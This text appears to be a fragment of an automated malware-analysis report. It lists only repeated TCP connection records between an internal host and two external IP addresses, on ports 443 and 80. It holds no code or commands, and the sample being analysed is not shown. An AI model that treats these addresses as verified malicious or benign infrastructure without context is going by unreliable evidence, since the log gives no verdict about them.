                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global traffic TCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global traffic TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49161
